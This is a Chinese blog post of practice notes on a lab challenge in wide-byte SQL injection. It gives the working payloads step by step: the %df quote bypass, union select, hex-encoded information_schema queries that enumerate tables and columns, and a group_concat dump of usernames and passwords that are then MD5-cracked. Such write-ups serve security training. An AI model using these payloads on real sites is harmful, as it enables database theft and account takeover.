刷题笔记:SQL注入漏洞测试(宽字节)

由题目知,注入的方式为宽字节注入

所以在‘前加入%df,发现页面报错,说明闭合成功

接下来用and语句判断有无注入点

可得知有注入点

用order by语句猜字段数

可得知字段数为5

用union进行联合查询

发现联合查询并没有拼接在一起

所以在1前加个-号

将想查询的信息替换3,5这两个数字

可以得到版本高于5.0,可以用information_schema这个表进行下面的查询

也得知了数据库名称为mozhe_discuz_stormgroup

因为前面已经得知’会被过滤,为了绕过此过滤,应该用16进制代替

运用(select group_concat(table_name) from information_schema.tables where table_schema =0x6d6f7a68655f64697363757a5f73746f726d67726f7570)语句替代3的位置,可得知表的名字为notice,stormgroup_member

感觉stormgroup_member这个表更像我们所需的表,因此,用语句  (select group_concat(column_name) from information_schema.columns where table_name=0x73746f726d67726f75705f6d656d626572)代替5的位置

得知列名有name,password,status

感觉name和password两个列名有用,先查这两个列名 

利用语句select group_concat(name,password) from stormgroup_member可得name和password

用MD5解密得密码登录后即可得flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值